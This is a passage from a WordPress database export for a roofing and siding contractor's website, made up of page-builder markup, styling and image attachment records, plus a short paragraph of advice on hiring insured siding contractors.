49px; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Recent Work','','inherit','closed','closed','','166-revision-v1','','','2022-08-23 18:47:30','2022-08-23 18:47:30','',166,'https://cteisys.com/?p=452',0,'revision','',0),(436,1,'2022-08-23 18:41:23','2022-08-23 18:41:23','','12038053_1138498862831220_6417864339135922840_n','','inherit','','closed','','12038053_1138498862831220_6417864339135922840_n','','','2022-08-23 18:41:23','2022-08-23 18:41:23','',166,'https://cteisys.com/wp-content/uploads/2022/08/12038053_1138498862831220_6417864339135922840_n.jpg',0,'attachment','image/jpeg',0),(437,1,'2022-08-23 18:41:26','2022-08-23 18:41:26','','15895119_1523671777647258_1853174486573971799_n','','inherit','','closed','','15895119_1523671777647258_1853174486573971799_n','','','2022-08-23 18:41:26','2022-08-23 18:41:26','',166,'https://cteisys.com/wp-content/uploads/2022/08/15895119_1523671777647258_1853174486573971799_n.jpg',0,'attachment','image/jpeg',0),(438,1,'2022-08-23 18:41:29','2022-08-23 18:41:29','','17992072_1641106229237145_7019424871005086701_n','','inherit','','closed','','17992072_1641106229237145_7019424871005086701_n-2','','','2022-08-23 18:41:29','2022-08-23 18:41:29','',166,'https://cteisys.com/wp-content/uploads/2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg',0,'attachment','image/jpeg',0),(439,1,'2022-08-23 18:41:33','2022-08-23 18:41:33','','18033389_1641106099237158_2286138393352834454_n','','inherit','','closed','','18033389_1641106099237158_2286138393352834454_n','','','2022-08-23 18:41:33','2022-08-23 18:41:33','',166,'https://cteisys.com/wp-content/uploads/2022/08/18033389_1641106099237158_2286138393352834454_n.jpg',0,'attachment','image/jpeg',0),(440,1,'2022-08-23 18:41:35','2022-08-23 18:41:35','','18033957_1641106155903819_3439710667750671365_n','','inherit','','closed','','18033957_1641106155903819_3439710667750671365_n','','','2022-08-23 18:41:35','2022-08-23 18:41:35','',166,'https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg',0,'attachment','image/jpeg',0),(441,1,'2022-08-23 18:41:38','2022-08-23 18:41:38','','18057957_1641106209237147_2139335743547445839_n','','inherit','','closed','','18057957_1641106209237147_2139335743547445839_n','','','2022-08-23 18:41:38','2022-08-23 18:41:38','',166,'https://cteisys.com/wp-content/uploads/2022/08/18057957_1641106209237147_2139335743547445839_n.jpg',0,'attachment','image/jpeg',0),(442,1,'2022-08-23 18:41:41','2022-08-23 18:41:41','','18118635_1641106092570492_880445919232503964_n','','inherit','','closed','','18118635_1641106092570492_880445919232503964_n','','','2022-08-23 18:41:41','2022-08-23 18:41:41','',166,'https://cteisys.com/wp-content/uploads/2022/08/18118635_1641106092570492_880445919232503964_n.jpg',0,'attachment','image/jpeg',0),(443,1,'2022-08-23 18:41:44','2022-08-23 18:41:44','','18118866_1641106242570477_8035677580998091915_n','','inherit','','closed','','18118866_1641106242570477_8035677580998091915_n','','','2022-08-23 18:41:44','2022-08-23 18:41:44','',166,'https://cteisys.com/wp-content/uploads/2022/08/18118866_1641106242570477_8035677580998091915_n.jpg',0,'attachment','image/jpeg',0),(444,1,'2022-08-23 18:41:48','2022-08-23 18:41:48','','18119545_1646581548689613_8488233903493088586_n','','inherit','','closed','','18119545_1646581548689613_8488233903493088586_n','','','2022-08-23 18:41:48','2022-08-23 18:41:48','',166,'https://cteisys.com/wp-content/uploads/2022/08/18119545_1646581548689613_8488233903493088586_n.jpg',0,'attachment','image/jpeg',0),(445,1,'2022-08-23 18:41:50','2022-08-23 18:41:50','','23517652_1851799148167851_4518671867384389908_n','','inherit','','closed','','23517652_1851799148167851_4518671867384389908_n','','','2022-08-23 18:41:50','2022-08-23 18:41:50','',166,'https://cteisys.com/wp-content/uploads/2022/08/23517652_1851799148167851_4518671867384389908_n.jpg',0,'attachment','image/jpeg',0),(446,1,'2022-08-23 18:41:53','2022-08-23 18:41:53','','23795383_1868197219861377_192834509148892931_n','','inherit','','closed','','23795383_1868197219861377_192834509148892931_n','','','2022-08-23 18:41:53','2022-08-23 18:41:53','',166,'https://cteisys.com/wp-content/uploads/2022/08/23795383_1868197219861377_192834509148892931_n.jpg',0,'attachment','image/jpeg',0),(447,1,'2022-08-23 18:41:56','2022-08-23 18:41:56','','23843260_1868197133194719_3148537784022538449_n','','inherit','','closed','','23843260_1868197133194719_3148537784022538449_n','','','2022-08-23 18:41:56','2022-08-23 18:41:56','',166,'https://cteisys.com/wp-content/uploads/2022/08/23843260_1868197133194719_3148537784022538449_n.jpg',0,'attachment','image/jpeg',0),(448,1,'2022-08-23 18:41:59','2022-08-23 18:41:59','','23844616_1868197126528053_4157812209739993838_n','','inherit','','closed','','23844616_1868197126528053_4157812209739993838_n','','','2022-08-23 18:41:59','2022-08-23 18:41:59','',166,'https://cteisys.com/wp-content/uploads/2022/08/23844616_1868197126528053_4157812209739993838_n.jpg',0,'attachment','image/jpeg',0),(449,1,'2022-08-23 18:42:02','2022-08-23 18:42:02','','25592097_1899639136717185_4321270429465251825_n','','inherit','','closed','','25592097_1899639136717185_4321270429465251825_n','','','2022-08-23 18:42:02','2022-08-23 18:42:02','',166,'https://cteisys.com/wp-content/uploads/2022/08/25592097_1899639136717185_4321270429465251825_n.jpg',0,'attachment','image/jpeg',0),(450,1,'2022-08-23 18:42:05','2022-08-23 18:42:05','','25660384_1899639140050518_6277447985993158090_n','','inherit','','closed','','25660384_1899639140050518_6277447985993158090_n','','','2022-08-23 18:42:05','2022-08-23 18:42:05','',166,'https://cteisys.com/wp-content/uploads/2022/08/25660384_1899639140050518_6277447985993158090_n.jpg',0,'attachment','image/jpeg',0),(453,1,'2022-08-23 18:48:50','2022-08-23 18:48:50','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30125cb2-5b1a-4355-96e3-c2a9ea89f965\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"afa0e568-68f4-4025-b8bc-c877ecbbb129\"} -->\n<style type=\"text/css\"> .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-afa0e568-68f4-4025-b8bc-c877ecbbb129 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"6a05bb6a-276d-4790-b47d-858d6f80f6d3\"} -->\n<style type=\"text/css\"> .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a05bb6a-276d-4790-b47d-858d6f80f6d3\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"49f6ee6c-504d-4d60-938f-35ad6223261c\"} -->\n<style type=\"text/css\"> .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-49f6ee6c-504d-4d60-938f-35ad6223261c\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2f8e1399-a394-4dc5-afcc-503ec3adb6af\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2f8e1399-a394-4dc5-afcc-503ec3adb6af\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roof And siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>Few things add curb appeal better than new, clean siding. With so many siding contractors out there to choose from getting started on your project can be a little overwhelming, so let us help!<br><br>Good siding contractors will be able to help you pick the right kind of siding for your home based on budget, climate, design and more! This will make sure that you get the most out of your new or renovated siding.<br><br>Just a note: when going with a new siding contractor be sure they have adequate liability insurance. Anyone with a truck and a ladder can claim to be a siding contractor, so there are plenty of uninsured one-man operations out there. You can never be too careful for a siding installation job that will require the siding contractors to climb on your roof!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1715a7e2-d9ed-427a-be77-136e8c2c931b\"} -->\n<style type=\"text/css\"> .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1715a7e2-d9ed-427a-be77-136e8c2c931b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"efa13df2-51dc-4c44-938f-814450f36d07\"} -->\n<style type=\"text/css\"> .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-efa13df2-51dc-4c44-938f-814450f36d07\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"49885c91-6f61-4ac3-8911-3a58424dd7c7\"} -->\n<style type=\"text/css\"> .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://cteisys.com/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://cteisys.com/home/slider2/\" class=\"wp-image-34\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/248413504_4961941493820252_6022205579321516239_n.jpg\" alt=\"\" data-id=\"411\" data-link=\"https://cteisys.com/248413504_4961941493820252_6022205579321516239_n/\" class=\"wp-image-411\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" data-id=\"413\" data-link=\"https://cteisys.com/c60adea113fb2f5f80419bb170309509/\" class=\"wp-image-413\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" 